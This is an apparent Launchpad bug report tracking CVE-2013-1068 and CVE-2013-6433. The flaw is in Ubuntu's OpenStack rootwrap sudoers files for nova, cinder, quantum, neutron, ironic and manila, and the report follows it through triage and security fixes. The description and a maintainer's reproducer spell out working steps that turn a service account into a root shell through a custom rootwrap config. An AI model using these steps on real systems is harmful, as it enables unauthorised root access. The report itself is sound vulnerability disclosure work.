rootwrap sudoers configuration does not follow packaging guidelines

Bug #1185019 reported by Darragh O'Reilly on 2013-05-28
6
This bug affects 1 person
Affects Status Importance Assigned to Milestone
cinder (Ubuntu)
High
Chuck Short
Saucy
High
Jamie Strandboge
Trusty
High
Jamie Strandboge
Utopic
High
Chuck Short
ironic (Ubuntu)
Undecided
Unassigned
Utopic
Undecided
Unassigned
manila (Ubuntu)
Undecided
Unassigned
Utopic
Undecided
Unassigned
neutron (Ubuntu)
High
Chuck Short
Saucy
High
Jamie Strandboge
Trusty
High
Jamie Strandboge
Utopic
High
Chuck Short
nova (Ubuntu)
High
Chuck Short
Saucy
High
Jamie Strandboge
Trusty
High
Jamie Strandboge
Utopic
High
Chuck Short

Bug Description

The rootwrap packaging guidelines at https://wiki.openstack.org/wiki/Packager/Rootwrap says that the sudoers file should have:

nova ALL = (root) NOPASSWD: /usr/bin/nova-rootwrap /etc/nova/rootwrap.conf *

But on Ubuntu 12.10 it is:

# cat /etc/sudoers.d/nova_sudoers
Defaults:nova !requiretty

nova ALL = (root) NOPASSWD: /usr/bin/nova-rootwrap

Now if an attacker somehow gets a shell under user nova they can specify any argument for nova-rootwrap:

$ id
uid=108(nova) gid=113(nova) groups=113(nova),112(libvirtd)
$
$ echo [DEFAULT] >/tmp/my-rootwrap.conf
$ echo filters_path=/tmp/my-filters.d >>/tmp/my-rootwrap.conf
$
$ mkdir /tmp/my-filters.d
$ echo [Filters] >/tmp/my-filters.d/my.filters
$ echo my-shell: CommandFilter, /bin/sh, root >>/tmp/my-filters.d/my.filters
$
$ sudo nova-rootwrap /tmp/my-rootwrap.conf sh
#
# id
uid=0(root) gid=0(root) groups=0(root)

The same goes for the quantum_sudoers from quantum-common.

# lsb_release -rd
Description: Ubuntu 12.04 LTS
Release: 12.04

# apt-cache policy nova-common
nova-common:
  Installed: 1:2013.1-0ubuntu2.1~cloud0
  Candidate: 1:2013.1-0ubuntu2.1~cloud0
  Version table:
 *** 1:2013.1-0ubuntu2.1~cloud0 0
        500 http://ubuntu-cloud.archive.canonical.com/ubuntu/ precise-updates/grizzly/main amd64 Packages
        100 /var/lib/dpkg/status
     2012.1.3+stable-20130423-e52e6912-0ubuntu1.1 0
        500 http://mirror.sov.uk.goscomb.net/ubuntu/ precise-updates/main amd64 Packages
        500 http://security.ubuntu.com/ubuntu/ precise-security/main amd64 Packages
     2012.1-0ubuntu2 0
        500 http://mirror.sov.uk.goscomb.net/ubuntu/ precise/main amd64 Packages

Related branches

Changed in nova (Ubuntu Quantal):
status: New → Triaged
importance: Undecided → High
Changed in nova (Ubuntu Raring):
status: New → Triaged
importance: Undecided → High
Changed in nova (Ubuntu Saucy):
status: New → Triaged
importance: Undecided → High
Changed in nova (Ubuntu Trusty):
status: New → Triaged
importance: Undecided → High
Jamie Strandboge (jdstrand) wrote :

Thanks for your bug report, I can confirm this.

Changed in cinder (Ubuntu Quantal):
status: New → Triaged
importance: Undecided → High
Changed in cinder (Ubuntu Raring):
status: New → Triaged
importance: Undecided → High
Changed in cinder (Ubuntu Saucy):
status: New → Triaged
importance: Undecided → High
Changed in cinder (Ubuntu Trusty):
status: New → Triaged
importance: Undecided → High
no longer affects: quantum (Ubuntu Saucy)
no longer affects: quantum (Ubuntu Trusty)
Jamie Strandboge (jdstrand) wrote :

Confirmed to affect cinder.

Jamie Strandboge (jdstrand) wrote :

Confirmed to affect quantum (does not exist in 13.10 and higher).

Changed in quantum (Ubuntu Quantal):
status: New → Triaged
importance: Undecided → High
Changed in quantum (Ubuntu Raring):
status: New → Triaged
importance: Undecided → High
Changed in quantum (Ubuntu):
status: New → Invalid
summary: - nova_sudoers and quantum_sudoers do not follow packaging guidelines
+ rootwrap sudoers configuration does not follow packaging guidelines
Marc Deslauriers (mdeslaur) wrote :

This is CVE-2013-1068

Jamie Strandboge (jdstrand) wrote :

Sorry for all the bug noise-- there is a bug in launchpad where if I remove a task in one source I can't add it back in another source, so I had to start over.

no longer affects: cinder (Ubuntu)
no longer affects: cinder (Ubuntu Quantal)
no longer affects: cinder (Ubuntu Raring)
no longer affects: cinder (Ubuntu Saucy)
no longer affects: cinder (Ubuntu Trusty)
no longer affects: neutron (Ubuntu Raring)
no longer affects: neutron (Ubuntu Quantal)
no longer affects: neutron (Ubuntu)
no longer affects: quantum (Ubuntu)
no longer affects: quantum (Ubuntu Quantal)
no longer affects: quantum (Ubuntu Raring)
no longer affects: cinder (Ubuntu)
no longer affects: nova (Ubuntu Trusty)
no longer affects: nova (Ubuntu Saucy)
no longer affects: nova (Ubuntu Raring)
no longer affects: nova (Ubuntu Quantal)
Jamie Strandboge (jdstrand) wrote :

neutron does not exist in 12.10 and 13.04.

Changed in neutron (Ubuntu Quantal):
status: New → Invalid
Changed in neutron (Ubuntu Raring):
status: New → Invalid
Jamie Strandboge (jdstrand) wrote :

quantum does not exist in 13.10 or 14.04

Changed in quantum (Ubuntu Saucy):
status: New → Invalid
Changed in quantum (Ubuntu Trusty):
status: New → Invalid
Changed in cinder (Ubuntu Quantal):
status: New → Triaged
importance: Undecided → High
Changed in cinder (Ubuntu Raring):
status: New → Triaged
importance: Undecided → High
Changed in cinder (Ubuntu Saucy):
status: New → Triaged
importance: Undecided → High
Changed in cinder (Ubuntu Trusty):
status: New → Triaged
importance: Undecided → High
Changed in neutron (Ubuntu Saucy):
status: New → Triaged
importance: Undecided → High
Changed in neutron (Ubuntu Trusty):
status: New → Triaged
importance: Undecided → High
Changed in nova (Ubuntu Quantal):
status: New → Triaged
importance: Undecided → High
Changed in nova (Ubuntu Raring):
status: New → Triaged
importance: Undecided → High
Changed in nova (Ubuntu Saucy):
status: New → Triaged
importance: Undecided → High
Changed in quantum (Ubuntu Quantal):
status: New → Triaged
importance: Undecided → High
Changed in quantum (Ubuntu Raring):
status: New → Triaged
importance: Undecided → High
Jamie Strandboge (jdstrand) wrote :

I did an archive grep of trusty and found that cinder, quantum, nova and neutron are all affected. I'll do another grep for quantal, raring and saucy. Also, Debian is affected and I bet other distros might be too, so this will need distro coordination.

Jamie Strandboge (jdstrand) wrote :

Attached is a reproducer based on the bug description. This does not need a working openstack to demonstrate the vulnerability. All that is needed is installing *-common. Eg:
 * nova-common
 * cinder-common
 * quantum-common
 * neutron-common

$ sudo -u cinder /tmp/CVE-2013-1068.sh # Ubuntu 13.04
Running as cinder
$ id
uid=110(cinder) gid=118(cinder) groups=118(cinder)
$ cat /tmp/cinder/my-rootwrap.conf
[DEFAULT]
filters_path=/tmp/cinder/my-filters.d
$ cat /tmp/cinder/my-filters.d/my.filters
[Filters]
my-shell: CommandFilter, /bin/sh, root
$ sudo -K
$ sudo -n cinder-rootwrap /tmp/cinder/my-rootwrap.conf sh -c id
uid=0(root) gid=0(root) groups=0(root)
FAIL

$ sudo -u nova /tmp/CVE-2013-1068.sh # Ubuntu 13.04
Running as nova
$ id
uid=112(nova) gid=120(nova) groups=120(nova),122(libvirtd)
$ cat /tmp/nova/my-rootwrap.conf
[DEFAULT]
filters_path=/tmp/nova/my-filters.d
$ cat /tmp/nova/my-filters.d/my.filters
[Filters]
my-shell: CommandFilter, /bin/sh, root
$ sudo -K
$ sudo -n nova-rootwrap /tmp/nova/my-rootwrap.conf sh -c id
uid=0(root) gid=0(root) groups=0(root)
FAIL

$ sudo -u quantum /tmp/CVE-2013-1068.sh # Ubuntu 13.04
Running as quantum
$ id
uid=117(quantum) gid=124(quantum) groups=124(quantum)
$ cat /tmp/quantum/my-rootwrap.conf
[DEFAULT]
filters_path=/tmp/quantum/my-filters.d
$ cat /tmp/quantum/my-filters.d/my.filters
[Filters]
my-shell: CommandFilter, /bin/sh, root
$ sudo -K
$ sudo -n quantum-rootwrap /tmp/quantum/my-rootwrap.conf sh -c id
uid=0(root) gid=0(root) groups=0(root)
FAIL

$ sudo -u neutron /tmp/CVE-2013-1068.sh # Ubuntu 13.10
Running as neutron
$ id
uid=117(neutron) gid=125(neutron) groups=125(neutron)
$ cat /tmp/neutron/my-rootwrap.conf
[DEFAULT]
filters_path=/tmp/neutron/my-filters.d
$ cat /tmp/neutron/my-filters.d/my.filters
[Filters]
my-shell: CommandFilter, /bin/sh, root
$ sudo -K
$ sudo -n neutron-rootwrap /tmp/neutron/my-rootwrap.conf sh -c id
uid=0(root) gid=0(root) groups=0(root)
FAIL

Jamie Strandboge (jdstrand) wrote :
Jamie Strandboge (jdstrand) wrote :

Quantum and Neutron have been assigned CVE-2013-6433.

Jamie Strandboge (jdstrand) wrote :

quantal and raring are now EOL so removing those tasks. Removing quantum since it only existed in EOL releases.

Changed in quantum (Ubuntu Quantal):
status: Triaged → Won't Fix
no longer affects: quantum (Ubuntu Quantal)
no longer affects: quantum (Ubuntu Raring)
no longer affects: cinder (Ubuntu Quantal)
no longer affects: cinder (Ubuntu Raring)
no longer affects: neutron (Ubuntu Quantal)
no longer affects: neutron (Ubuntu Raring)
no longer affects: nova (Ubuntu Quantal)
no longer affects: nova (Ubuntu Raring)
no longer affects: quantum (Ubuntu)
no longer affects: quantum (Ubuntu Saucy)
no longer affects: quantum (Ubuntu Trusty)
Jamie Strandboge (jdstrand) wrote :

This also affects ironic and manila (both community supported (universe) and both new in 14.04). manila is currently uninstallable on 14.04.

Changed in ironic (Ubuntu Utopic):
status: New → Triaged
Changed in manila (Ubuntu Utopic):
status: New → Triaged
Changed in nova (Ubuntu Saucy):
status: Triaged → Fix Committed
Changed in nova (Ubuntu Trusty):
status: Triaged → Fix Committed
Changed in neutron (Ubuntu Saucy):
status: Triaged → Fix Committed
Changed in neutron (Ubuntu Trusty):
status: Triaged → Fix Committed
Changed in cinder (Ubuntu Saucy):
status: Triaged → Fix Committed
Changed in cinder (Ubuntu Trusty):
status: Triaged → Fix Committed
Changed in cinder (Ubuntu Saucy):
assignee: nobody → Jamie Strandboge (jdstrand)
Changed in cinder (Ubuntu Trusty):
assignee: nobody → Jamie Strandboge (jdstrand)
Changed in nova (Ubuntu Saucy):
assignee: nobody → Jamie Strandboge (jdstrand)
Changed in nova (Ubuntu Trusty):
assignee: nobody → Jamie Strandboge (jdstrand)
Changed in neutron (Ubuntu Saucy):
assignee: nobody → Jamie Strandboge (jdstrand)
Changed in neutron (Ubuntu Trusty):
assignee: nobody → Jamie Strandboge (jdstrand)
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package nova - 1:2014.1-0ubuntu1.2

---------------
nova (1:2014.1-0ubuntu1.2) trusty-security; urgency=medium

  * SECURITY UPDATE: specify /etc/nova/rootwrap.conf for use with
    nova-rootwrap
    - CVE-2013-1068 (LP: #1185019)
 -- Jamie Strandboge <email address hidden> Mon, 09 Jun 2014 09:32:44 -0500

Changed in nova (Ubuntu Trusty):
status: Fix Committed → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package nova - 1:2013.2.3-0ubuntu1.2

---------------
nova (1:2013.2.3-0ubuntu1.2) saucy-security; urgency=medium

  * SECURITY UPDATE: no change rebuild for security
    - CVE-2013-4463 (LP: #1206081)
    - CVE-2013-4469 (LP: #1206081)
    - CVE-2013-7130 (LP: #1251590)
    - CVE-2014-0134 (LP: #1221190)
    - CVE-2014-0167 (LP: #1290537)
  * SECURITY UPDATE: specify /etc/nova/rootwrap.conf for use with
    nova-rootwrap
    - CVE-2013-1068 (LP: #1185019)
 -- Jamie Strandboge <email address hidden> Mon, 09 Jun 2014 09:29:12 -0500

Changed in nova (Ubuntu Saucy):
status: Fix Committed → Fix Released
Changed in cinder (Ubuntu Utopic):
assignee: nobody → Chuck Short (zulcss)
Changed in nova (Ubuntu Utopic):
assignee: nobody → Chuck Short (zulcss)
Changed in neutron (Ubuntu Utopic):
assignee: nobody → Chuck Short (zulcss)
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package nova - 1:2014.2~b1-0ubuntu2

---------------
nova (1:2014.2~b1-0ubuntu2) utopic; urgency=medium

  * SECURITY UPDATE: specify /etc/nova/rootwrap.conf for use with
    nova-rootwrap
    - CVE-2013-1068 (LP: #1185019)
 -- Chuck Short <email address hidden> Wed, 18 Jun 2014 11:17:52 -0400

Changed in nova (Ubuntu Utopic):
status: Triaged → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package cinder - 1:2014.2~b1-0ubuntu2

---------------
cinder (1:2014.2~b1-0ubuntu2) utopic; urgency=medium

  * SECURITY UPDATE: specify /etc/nova/rootwrap.conf for use with
    nova-rootwrap
    - CVE-2013-1068 (LP: #1185019)
 -- Chuck Short <email address hidden> Wed, 18 Jun 2014 11:37:45 -0400

Changed in cinder (Ubuntu Utopic):
status: Triaged → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package cinder - 1:2013.2.3-0ubuntu1.1

---------------
cinder (1:2013.2.3-0ubuntu1.1) saucy-security; urgency=medium

  * SECURITY UPDATE: specify /etc/cinder/rootwrap.conf for use with
    cinder-rootwrap
    - CVE-2013-1068 (LP: #1185019)
 -- Jamie Strandboge <email address hidden> Mon, 09 Jun 2014 09:43:48 -0500

Changed in cinder (Ubuntu Saucy):
status: Fix Committed → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package cinder - 1:2014.1-0ubuntu1.1

---------------
cinder (1:2014.1-0ubuntu1.1) trusty-security; urgency=medium

  * SECURITY UPDATE: specify /etc/cinder/rootwrap.conf for use with
    cinder-rootwrap
    - CVE-2013-1068 (LP: #1185019)
 -- Jamie Strandboge <email address hidden> Mon, 09 Jun 2014 09:45:12 -0500

Changed in cinder (Ubuntu Trusty):
status: Fix Committed → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package neutron - 1:2014.2~b1-0ubuntu3

---------------
neutron (1:2014.2~b1-0ubuntu3) utopic; urgency=medium

  * SECURITY UPDATE: specify /etc/neutron/rootwrap.conf for use with
    nova-rootwrap
    - CVE-2013-1068 (LP: #1185019)
 -- Chuck Short <email address hidden> Wed, 18 Jun 2014 12:43:51 -0400

Changed in neutron (Ubuntu Utopic):
status: Triaged → Fix Released
Adam Conrad (adconrad) on 2014-06-24
information type: Private Security → Public Security
information type: Public Security → Private Security
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package neutron - 1:2013.2.3-0ubuntu1.5

---------------
neutron (1:2013.2.3-0ubuntu1.5) saucy-security; urgency=medium

  * SECURITY UPDATE: specify /etc/neutron/rootwrap.conf for use with
    neutron-rootwrap
    - CVE-2013-6433 (LP: #1185019)
  * SECURITY UPDATE: Validate CIDR given as ip-prefix in
    security-group-rule-create
    - CVE-2014-0187
    - LP: #1300785
  * debian/patches/CVE-2014-0187b.patch: update for python-netaddr <= 0.7.10
  * SECURITY UPDATE: Install SNAT rules for ipv4 only
    - CVE-2014-4167
    - LP: #1309195
 -- Jamie Strandboge <email address hidden> Wed, 18 Jun 2014 16:15:47 -0500

Changed in neutron (Ubuntu Saucy):
status: Fix Committed → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package neutron - 1:2014.1-0ubuntu1.3

---------------
neutron (1:2014.1-0ubuntu1.3) trusty-security; urgency=medium

  * SECURITY UPDATE: specify /etc/neutron/rootwrap.conf for use with
    neutron-rootwrap
    - CVE-2013-6433 (LP: #1185019)
  * SECURITY UPDATE: Validate CIDR given as ip-prefix in
    security-group-rule-create
    - CVE-2014-0187
    - LP: #1300785
  * debian/patches/CVE-2014-0187b.patch: update for python-netaddr <= 0.7.10
  * SECURITY UPDATE: Install SNAT rules for ipv4 only
    - CVE-2014-4167
    - LP: #1309195
 -- Jamie Strandboge <email address hidden> Wed, 18 Jun 2014 16:12:37 -0500

Changed in neutron (Ubuntu Trusty):
status: Fix Committed → Fix Released
information type: Private Security → Public
James Page (james-page) wrote :

cinder + neutron had this bug referenced in the changelog for the uploads jdstrand did ontop of 2014.1.1 - marking verification-done as testing has been completed on the proposed version

tags: added: verfication-done

The verification of the Stable Release Update for cinder has completed successfully and the package has now been released to -updates. Subsequently, the Ubuntu Stable Release Updates Team is being unsubscribed and will not receive messages about this bug report. In the event that you encounter a regression using the package from -updates please report a new bug using ubuntu-bug and tag the bug report regression-update so we can easily find any regresssions.

Corey Bryant (corey.bryant) wrote :

Chris' statement also applies to neutron and nova.

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package ironic - 2014.2~rc1-0ubuntu1

---------------
ironic (2014.2~rc1-0ubuntu1) utopic; urgency=medium

  [ Adam Gandelman ]
  * New upstream release.
  * debian/patches/set_logdir.patch: Renamed to set_config_defaults.patch,
    also set default sqlite db connection.
  * debian/control: Refreshed dependencies for Juno, wrap-and-sort.
  * debian/ironic-common.install: Added ironic-nova-bm-migrate binary.
  * debian/ironic-common.postinst: Create the default sqlite database if
    configured to use it and it does not exist.
  * debian/pydist-overrides: Add pysendfile.
  * debian/ironic_sudoers: Add rootwrap.conf (LP: #1185019).

  [ James Page ]
  * d/rules,control: Increase test verbosity using subunit.
 -- Adam Gandelman <email address hidden> Tue, 30 Sep 2014 10:44:08 -0700

Changed in ironic (Ubuntu Utopic):
status: Triaged → Fix Released
James Page (james-page) wrote :

OK in vivid:

manila ALL = (root) NOPASSWD: /usr/bin/manila-rootwrap /etc/manila/rootwrap.conf *

Changed in manila (Ubuntu):
status: Triaged → Fix Released
Changed in manila (Ubuntu Utopic):
status: Triaged → Won't Fix
To post a comment you must log in.
This report contains Public information  Edit
Everyone can see this information.

Other bug subscribers